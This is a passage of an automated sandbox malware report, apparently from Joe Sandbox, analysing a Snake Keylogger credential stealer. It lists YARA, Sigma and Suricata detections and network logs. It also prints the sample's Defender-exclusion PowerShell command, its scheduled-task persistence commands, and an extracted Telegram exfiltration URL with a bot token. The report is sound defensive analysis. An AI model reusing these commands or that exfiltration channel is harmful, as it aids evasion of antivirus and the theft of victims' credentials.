9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b68:$a1: get_encryptedPassword 0x35788:$a1: get_encryptedPassword 0x561a8:$a1: get_encryptedPassword 0x14e54:$a2: get_encryptedUsername 0x35a74:$a2: get_encryptedUsername 0x56494:$a2: get_encryptedUsername 0x14974:$a3: get_timePasswordChanged 0x35594:$a3: get_timePasswordChanged 0x55fb4:$a3: get_timePasswordChanged 0x14a6f:$a4: get_passwordField 0x3568f:$a4: get_passwordField 0x560af:$a4: get_passwordField 0x14b7e:$a5: set_encryptedPassword 0x3579e:$a5: set_encryptedPassword 0x561be:$a5: set_encryptedPassword 0x161e3:$a7: get_logins 0x36e03:$a7: get_logins 0x57823:$a7: get_logins 0x16146:$a10: KeyLoggerEventArgs 0x36d66:$a10: KeyLoggerEventArgs 0x57786:$a10: KeyLoggerEventArgs
9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c53c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d15c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5db7c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b76e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c38e:$a3: \Google\Chrome\User Data\Default\Login Data 0x5cdae:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bba1:$a4: \Orbitum\User Data\Default\Login Data 0x3c7c1:$a4: \Orbitum\User Data\Default\Login Data 0x5d1e1:$a4: \Orbitum\User Data\Default\Login Data 0x1cbe0:$a5: \Kometa\User Data\Default\Login Data 0x3d800:$a5: \Kometa\User Data\Default\Login Data 0x5e220:$a5: \Kometa\User Data\Default\Login Data
9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15757:$s1: UnHook 0x36377:$s1: UnHook 0x56d97:$s1: UnHook 0x1575e:$s2: SetHook 0x3637e:$s2: SetHook 0x56d9e:$s2: SetHook 0x15766:$s3: CallNextHook 0x36386:$s3: CallNextHook 0x56da6:$s3: CallNextHook 0x15773:$s4: _hook 0x36393:$s4: _hook 0x56db3:$s4: _hook
9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b74:$x1: $%SMTPDV$ 0x3a794:$x1: $%SMTPDV$ 0x5b1b4:$x1: $%SMTPDV$ 0x18558:$x2: $#TheHashHere%& 0x39178:$x2: $#TheHashHere%& 0x59b98:$x2: $#TheHashHere%& 0x19b1c:$x3: %FTPDV$ 0x3a73c:$x3: %FTPDV$ 0x5b15c:$x3: %FTPDV$ 0x184f8:$x4: $%TelegramDv$ 0x39118:$x4: $%TelegramDv$ 0x59b38:$x4: $%TelegramDv$ 0x15db1:$x5: KeyLoggerEventArgs 0x16146:$x5: KeyLoggerEventArgs 0x369d1:$x5: KeyLoggerEventArgs 0x36d66:$x5: KeyLoggerEventArgs 0x573f1:$x5: KeyLoggerEventArgs 0x57786:$x5: KeyLoggerEventArgs 0x19b40:$m2: Clipboard Logs ID 0x19d7e:$m2: Screenshot Logs ID 0x19e8e:$m2: keystroke Logs ID
0.2.file.exe.452f3f0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.452f3f0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.file.exe.452f3f0.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.file.exe.452f3f0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b68:$a1: get_encryptedPassword 0x35588:$a1: get_encryptedPassword 0x14e54:$a2: get_encryptedUsername 0x35874:$a2: get_encryptedUsername 0x14974:$a3: get_timePasswordChanged 0x35394:$a3: get_timePasswordChanged 0x14a6f:$a4: get_passwordField 0x3548f:$a4: get_passwordField 0x14b7e:$a5: set_encryptedPassword 0x3559e:$a5: set_encryptedPassword 0x161e3:$a7: get_logins 0x36c03:$a7: get_logins 0x16146:$a10: KeyLoggerEventArgs 0x36b66:$a10: KeyLoggerEventArgs 0x15db1:$a11: KeyLoggerEventArgsEventHandler 0x367d1:$a11: KeyLoggerEventArgsEventHandler
0.2.file.exe.452f3f0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15757:$s1: UnHook 0x36177:$s1: UnHook 0x1575e:$s2: SetHook 0x3617e:$s2: SetHook 0x15766:$s3: CallNextHook 0x36186:$s3: CallNextHook 0x15773:$s4: _hook 0x36193:$s4: _hook
0.2.file.exe.452f3f0.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b74:$x1: $%SMTPDV$ 0x3a594:$x1: $%SMTPDV$ 0x18558:$x2: $#TheHashHere%& 0x38f78:$x2: $#TheHashHere%& 0x19b1c:$x3: %FTPDV$ 0x3a53c:$x3: %FTPDV$ 0x184f8:$x4: $%TelegramDv$ 0x38f18:$x4: $%TelegramDv$ 0x15db1:$x5: KeyLoggerEventArgs 0x16146:$x5: KeyLoggerEventArgs 0x367d1:$x5: KeyLoggerEventArgs 0x36b66:$x5: KeyLoggerEventArgs 0x19b40:$m2: Clipboard Logs ID 0x19d7e:$m2: Screenshot Logs ID 0x19e8e:$m2: keystroke Logs ID 0x3a560:$m2: Clipboard Logs ID 0x3a79e:$m2: Screenshot Logs ID 0x3a8ae:$m2: keystroke Logs ID 0x1a168:$m3: SnakePW 0x3ab88:$m3: SnakePW 0x19d56:$m4: \SnakeKeylogger\
0.2.file.exe.450e7d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.450e7d0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.file.exe.450e7d0.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.file.exe.450e7d0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b68:$a1: get_encryptedPassword 0x35788:$a1: get_encryptedPassword 0x561a8:$a1: get_encryptedPassword 0x14e54:$a2: get_encryptedUsername 0x35a74:$a2: get_encryptedUsername 0x56494:$a2: get_encryptedUsername 0x14974:$a3: get_timePasswordChanged 0x35594:$a3: get_timePasswordChanged 0x55fb4:$a3: get_timePasswordChanged 0x14a6f:$a4: get_passwordField 0x3568f:$a4: get_passwordField 0x560af:$a4: get_passwordField 0x14b7e:$a5: set_encryptedPassword 0x3579e:$a5: set_encryptedPassword 0x561be:$a5: set_encryptedPassword 0x161e3:$a7: get_logins 0x36e03:$a7: get_logins 0x57823:$a7: get_logins 0x16146:$a10: KeyLoggerEventArgs 0x36d66:$a10: KeyLoggerEventArgs 0x57786:$a10: KeyLoggerEventArgs
0.2.file.exe.450e7d0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15757:$s1: UnHook 0x36377:$s1: UnHook 0x56d97:$s1: UnHook 0x1575e:$s2: SetHook 0x3637e:$s2: SetHook 0x56d9e:$s2: SetHook 0x15766:$s3: CallNextHook 0x36386:$s3: CallNextHook 0x56da6:$s3: CallNextHook 0x15773:$s4: _hook 0x36393:$s4: _hook 0x56db3:$s4: _hook
0.2.file.exe.450e7d0.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b74:$x1: $%SMTPDV$ 0x3a794:$x1: $%SMTPDV$ 0x5b1b4:$x1: $%SMTPDV$ 0x18558:$x2: $#TheHashHere%& 0x39178:$x2: $#TheHashHere%& 0x59b98:$x2: $#TheHashHere%& 0x19b1c:$x3: %FTPDV$ 0x3a73c:$x3: %FTPDV$ 0x5b15c:$x3: %FTPDV$ 0x184f8:$x4: $%TelegramDv$ 0x39118:$x4: $%TelegramDv$ 0x59b38:$x4: $%TelegramDv$ 0x15db1:$x5: KeyLoggerEventArgs 0x16146:$x5: KeyLoggerEventArgs 0x369d1:$x5: KeyLoggerEventArgs 0x36d66:$x5: KeyLoggerEventArgs 0x573f1:$x5: KeyLoggerEventArgs 0x57786:$x5: KeyLoggerEventArgs 0x19b40:$m2: Clipboard Logs ID 0x19d7e:$m2: Screenshot Logs ID 0x19e8e:$m2: keystroke Logs ID
Click to see the 52 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe", ProcessId: 964, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp93EE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp93EE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\djqdPdQRO.exe, ParentImage: C:\Users\user\AppData\Roaming\djqdPdQRO.exe, ParentProcessId: 6628, ParentProcessName: djqdPdQRO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp93EE.tmp", ProcessId: 5588, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp", ProcessId: 6068, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe", ProcessId: 964, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3852, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp", ProcessId: 6068, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:19:51.368052+0100	2803305	3	Unknown Traffic	192.168.2.6	49724	188.114.96.3	443	TCP
2025-01-02T20:19:53.861802+0100	2803305	3	Unknown Traffic	192.168.2.6	49745	188.114.96.3	443	TCP
2025-01-02T20:19:55.193250+0100	2803305	3	Unknown Traffic	192.168.2.6	49759	188.114.96.3	443	TCP
2025-01-02T20:19:55.986554+0100	2803305	3	Unknown Traffic	192.168.2.6	49766	188.114.96.3	443	TCP
2025-01-02T20:19:56.428567+0100	2803305	3	Unknown Traffic	192.168.2.6	49771	188.114.96.3	443	TCP
2025-01-02T20:19:57.621211+0100	2803305	3	Unknown Traffic	192.168.2.6	49781	188.114.96.3	443	TCP
2025-01-02T20:20:01.950880+0100	2803305	3	Unknown Traffic	192.168.2.6	49818	188.114.96.3	443	TCP
2025-01-02T20:20:08.842016+0100	2803305	3	Unknown Traffic	192.168.2.6	49860	188.114.96.3	443	TCP
2025-01-02T20:20:15.806427+0100	2803305	3	Unknown Traffic	192.168.2.6	49905	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:19:49.536135+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49716	158.101.44.242	80	TCP
2025-01-02T20:19:50.692399+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49716	158.101.44.242	80	TCP
2025-01-02T20:19:52.129987+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49730	158.101.44.242	80	TCP
2025-01-02T20:19:54.489294+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49751	158.101.44.242	80	TCP
2025-01-02T20:19:55.426779+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49751	158.101.44.242	80	TCP
2025-01-02T20:19:56.645584+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49773	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000007.00000002.2319885033.00000000026E1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs/sendMessage?chat_id=7342994424", "Token": "7822875840:AAE1dEB39_r2yuQHwPOz--iI8ECcmIivnQs", "Chat_id": "7342994424", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49758 version: TLS 1.0

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: UzYE.pdb source: file.exe, djqdPdQRO.exe.0.dr
Source:	Binary string: UzYE.pdbSHA256 source: file.exe, djqdPdQRO.exe.0.dr

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49773 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49716 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49751 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49730 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49724 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49766 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49759 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49818 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49781 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49771 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49905 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49860 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49758 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
